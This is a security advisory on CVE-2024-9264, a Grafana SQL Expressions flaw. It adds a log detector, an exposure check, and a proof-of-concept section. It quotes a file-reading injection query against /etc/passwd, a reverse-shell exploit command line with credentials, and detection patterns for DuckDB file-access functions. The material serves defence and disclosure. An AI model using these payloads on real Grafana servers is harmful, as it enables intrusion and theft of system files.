Vulnerable Version: Grafana versions earlier than 11.0.5, 11.1.6, and 11.2.1
Fixed Version: 11.0.5, 11.1.6, or 11.2.1 (or later)
Base Score: 9.4 Critical
Vendor Description
Grafana is an open-source analytics and monitoring platform designed to visualize, query, and analyze
data from multiple sources in real-time. It provides an intuitive and highly customizable dashboard
interface, enabling users to track key performance metrics, detect trends, and respond to anomalies
across diverse systems and applications.
CVE-2024-9264 Vulnerability Details and Analysis
CVE-2024-9264 is a severe vulnerability affecting Grafana versions earlier than 11.0.5, 11.1.6, and 11.2.1,
specifically in deployments that use the DuckDB integration for SQL Expressions.
The vulnerability arises from improper sanitization of SQL queries, allowing remote attackers to inject
arbitrary SQL commands, which can lead to arbitrary code execution and unauthorized access to sensitive
files.
The flaw is triggered when an attacker injects a malformed SQL expression, in particular one that uses the
read_csv_auto() function exposed through the SQL Expressions feature. This function is meant to read CSV
files but can be abused for actions beyond its intended use. By crafting a malicious SQL query such as
SELECT * FROM read_csv_auto('/etc/passwd'), attackers can read system files like /etc/passwd, which
contains information about system users. Through the same query path, attackers can also create arbitrary
files with malicious content on the system and escalate the attack further by executing shell commands
embedded in those files.
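The mitigation section of this advisory calls for monitoring of unusual SQL Expressions. The following detector is an added example, not code from the advisory or from Grafana: it scans query records for DuckDB file-access functions. Only read_csv_auto() is named in the advisory; the other DuckDB reader/writer forms in the pattern table (read_csv, read_text, read_blob, read_json, read_parquet, COPY ... TO) are included as an assumption to broaden coverage. The JSON-lines record layout with a sql_expression field, and the sample log lines themselves, are constructed for the example; in a real deployment you would extract the expression text from your own request or audit logging in front of the Grafana query API.

```python
import json
import re

# Indicators of DuckDB file-system access inside a SQL Expression. read_csv_auto() is the
# function named in the advisory; the other entries are additional DuckDB file reader/writer
# forms added here as an assumption to widen coverage.
FILE_ACCESS_PATTERNS = {
    "read_csv_auto": re.compile(r"\bread_csv_auto\s*\(", re.IGNORECASE),
    "read_csv": re.compile(r"\bread_csv\s*\(", re.IGNORECASE),
    "read_text": re.compile(r"\bread_text\s*\(", re.IGNORECASE),
    "read_blob": re.compile(r"\bread_blob\s*\(", re.IGNORECASE),
    "read_json": re.compile(r"\bread_json(?:_auto)?\s*\(", re.IGNORECASE),
    "read_parquet": re.compile(r"\bread_parquet\s*\(", re.IGNORECASE),
    "copy_to_file": re.compile(r"\bCOPY\b[\s\S]+?\bTO\s+['\"]", re.IGNORECASE),
}

# A quoted absolute path inside an expression raises severity: legitimate SQL Expressions
# reference other query refIds (A, B, ...), never host file paths.
ABS_PATH = re.compile(r"['\"]\s*/[^'\"]*['\"]")


def scan_expression(sql: str) -> dict:
    """Classify one SQL Expression string. Matching is case-insensitive because DuckDB
    function names are case-insensitive, so mixed-case spellings must not slip through."""
    indicators = [name for name, rx in FILE_ACCESS_PATTERNS.items() if rx.search(sql)]
    has_path = bool(ABS_PATH.search(sql))
    if indicators and has_path:
        severity = "high"
    elif indicators:
        severity = "medium"
    else:
        severity = "none"
    return {"indicators": indicators, "absolute_path": has_path, "severity": severity}


def scan_log(lines) -> list:
    """Walk JSON-lines records (constructed layout: ts, user, src, sql_expression) and
    return findings for every record whose expression touches the file system.
    Non-JSON lines and records without a sql_expression field are skipped."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # plain-text log line, not one of our structured records
        sql = rec.get("sql_expression")
        if not sql:
            continue
        result = scan_expression(sql)
        if result["severity"] != "none":
            findings.append({"line": n, "user": rec.get("user"), "src": rec.get("src"), **result})
    return findings


# Constructed sample records: one benign expression, the advisory's read_csv_auto() query,
# a mixed-case variant of it, and one unstructured line that the scanner must ignore.
SAMPLE_LOG = "\n".join([
    '{"ts":"2024-10-18T10:01:02Z","user":"viewer1","src":"10.0.0.5","sql_expression":"SELECT time, value FROM A WHERE value > 10"}',
    '{"ts":"2024-10-18T10:01:09Z","user":"viewer1","src":"10.0.0.5","sql_expression":"SELECT * FROM read_csv_auto(\'/etc/passwd\')"}',
    '{"ts":"2024-10-18T10:01:15Z","user":"viewer1","src":"10.0.0.5","sql_expression":"select * from Read_Csv_Auto(\\"/etc/hosts\\")"}',
    'Oct 18 10:01:20 grafana[123]: logger=context level=info msg="Request Completed"',
])

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

Run as a script it prints two findings, both rated high because a DuckDB file reader and an absolute path appear together. Feeding it a real log stream is a matter of replacing SAMPLE_LOG with the lines from your own collector; the severity split lets a SIEM rule alert on "high" immediately while queuing "medium" hits for review.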
One of the most dangerous aspects of this vulnerability is that it does not require any user interaction to be
exploited. Attackers can remotely execute these malicious queries without needing the victim to click on
anything or take any specific action. The ease of exploitation, combined with the critical nature of the
potential damage (remote code execution, unauthorized file access, and manipulation), makes this
vulnerability extremely impactful for organizations running affected versions of Grafana.
The attack’s impact spans the confidentiality, integrity, and availability of the system. Sensitive data can be
compromised by reading system files, and arbitrary commands can be executed, potentially taking control of
the server and launching further attacks. Once the exploit is successful, attackers can escalate privileges,
compromise sensitive data, and disrupt operations, causing significant damage.
Impact
The impact of this vulnerability is severe, as it allows attackers with low privileges to execute arbitrary
commands and exploit local file inclusion, potentially compromising sensitive data and system integrity. This could lead to unauthorized access, data breaches, and the complete compromise of affected systems.
Organizations using vulnerable versions of Grafana are at significant risk and should prioritize remediation efforts.
Mitigation
Users of vulnerable Grafana versions should immediately update to a fixed version (11.0.5, 11.1.6, or
11.2.1, or later) to address CVE-2024-9264. Where patching is not immediately possible, an interim mitigation is to remove or exclude the DuckDB executable from the system's PATH so the vulnerable code path cannot reach it. Additionally, organizations should implement monitoring and detection measures to identify unusual SQL queries or other suspicious activity associated with Grafana's SQL Expressions feature.
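The following exposure check is an added example, not a script from the advisory or from Grafana. It combines the two remediation points above: it compares a Grafana version string against the three fixed releases named here, and it reports whether a duckdb executable is reachable through PATH, which is the interim mitigation. The version ranges are taken from this advisory; because the advisory does not say whether releases before 11.0 are in scope, the check reports those as outside the listed ranges rather than guessing. The version string is passed in as an argument; one place to obtain it is the "version" field returned by Grafana's /api/health endpoint.

```python
import re
import shutil
from typing import Optional

# Fixed releases named in the advisory, keyed by the affected minor line.
FIXED_RELEASES = {
    (11, 0): (11, 0, 5),
    (11, 1): (11, 1, 6),
    (11, 2): (11, 2, 1),
}


def parse_version(version: str) -> tuple:
    """Extract (major, minor, patch) from a Grafana version string such as '11.1.5' or
    '11.2.0+security-01'; anything after the patch number is ignored."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(version: str) -> Optional[bool]:
    """True if the version is below the fix for its minor line, False if it is a fixed
    release or anything later, None for releases before 11.0 (not listed in the advisory,
    so deliberately left unassessed here)."""
    major, minor, patch = parse_version(version)
    if major < 11:
        return None
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:  # 11.3 or later, or a later major: newer than every fixed release named
        return False
    return (major, minor, patch) < fixed


def duckdb_on_path(path_env: Optional[str] = None) -> Optional[str]:
    """Path of a 'duckdb' executable reachable via PATH (or the PATH string supplied),
    or None. The advisory's interim mitigation is to make this return None."""
    return shutil.which("duckdb", path=path_env)


def assess(version: str, path_env: Optional[str] = None) -> dict:
    """Combine the version test and the PATH test into one remediation status."""
    vuln = is_vulnerable_version(version)
    duck = duckdb_on_path(path_env)
    if vuln is None:
        status = "version outside the ranges listed for CVE-2024-9264; review separately"
    elif not vuln:
        status = "fixed release; no action required for CVE-2024-9264"
    elif duck:
        status = "VULNERABLE: affected version and duckdb reachable via PATH; upgrade now"
    else:
        status = "affected version; duckdb not on PATH (interim mitigation in place); still upgrade"
    return {"version": version, "vulnerable_version": vuln, "duckdb_path": duck, "status": status}


if __name__ == "__main__":
    import os
    import sys

    # Example invocation: python check_cve_2024_9264.py 11.1.5
    reported = sys.argv[1] if len(sys.argv) > 1 else "11.1.5"
    print(assess(reported, os.environ.get("PATH")))
```

Running the script on the Grafana host itself gives the most useful answer, since PATH as seen by the Grafana service account is what matters; when running it elsewhere, pass that account's PATH string explicitly as the second argument to assess().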
POC
Proof Of Concept for Remote Code Execution in Grafana (CVE-2024-9264)
# python poc.py --url http://192.168.29.112:3000 --username admin --password SecurePassword123! --reverse-ip 192.168.29.116 --reverse-port 9001
References
https://www.sonicwall.com/blog/command-injection-and-local-file-inclusion-in-grafana-cve-2024-9264
https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit
